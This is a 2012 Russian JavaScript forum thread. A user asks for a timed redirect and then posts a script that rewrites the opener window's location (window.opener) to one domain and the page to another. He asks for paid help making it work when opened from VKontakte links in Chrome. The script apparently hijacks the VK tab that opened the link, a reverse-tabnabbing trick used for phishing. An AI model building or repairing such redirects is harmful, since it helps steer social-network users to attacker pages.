Javascript-форум (https://javascript.ru/forum/)
-   Events/DOM/Window (https://javascript.ru/forum/events/)
-   -   Задержка в JavaScript (https://javascript.ru/forum/events/33064-zaderzhka-v-javascript.html)

eqwill 09.11.2012 01:41

Задержка в JavaScript
 
Доброго времени суток уважаемые форумчане! Необходимо написать в JavaScript что бы при срабатывание самого JavaScript была задержка допустим 3 секунды? вот мой index.html на картинке
варианты есть Settimeout. sleep. setinterval и.т.д!!!
что сюда засунуть даже без понятия, подскажите люди умные!
а с меня вознаграждение за ваше потраченное время ICQ-620857361
Извиняюсь за флуд, не знаю в какую тему писать))) Спасибо за внимание!

Your 09.11.2012 05:58

<script type="text/javascript">
	setTimeout(function() {
		document.location.href='http://';
	},3000);
</script>

eqwill 09.11.2012 19:55

Добрый день уважаемый, сможете оказать помощь в редактировании скрипта??? <html>
<meta name="robots" content="noindex,nofollow">
<head><script language="JavaScript">
setTimeout(function(){
parent.window.opener.location="http://krunton.ru";
<!-- Old browser shield
window.location.href="http://slosfok.ru"
// -->
}, 3000);</script>
</head>
<body>
</body>
</html>
нужна задержка только на первую ссылку, на вторую не надо.. изначально скрипт работал на всех браузерах (потом перестал работать в гугл хром), необходимо сделать такой скрипт чтобы он работал через вк, как в гугл хроме так и в остальных браузерах соответственно с задержкой на 1ю ссылку... мы думаем что задержка поможет решить часть проблемы... возможно дело не только в ней
создаем index.html с нашим кодом и проверяем через вк на работоспособность во всех браузерах...
(вк походу что-то поменял в в настройках по js и потому наш индекс теперь не работает в хроме) а в остальном он работает
по всем вопросам и вознаграждения стучимся в icq 620857361 спасибо за внимание

eqwill 09.11.2012 22:14

скрипт до недавнего времени прекрасно работал без всяких задержек! суть>>> возможно в скрипте надо сделать задержку только на 1ю ссылку примерно на 2-3 сек, закидываешь его в index.html сохраняешь! заливаешь готовый index.html на народ.ру, заходишь в VK0ntakt! и проверяешь зареганую ссылку с народа на работоспособность скрипта под браузером google.hrom в VK. остальные браузеры вроде и так работали! но на всякий пожарный проверьте и их! потраченное время оплатим! моя icq 620857361


Часовой пояс GMT +3, время: 04:36.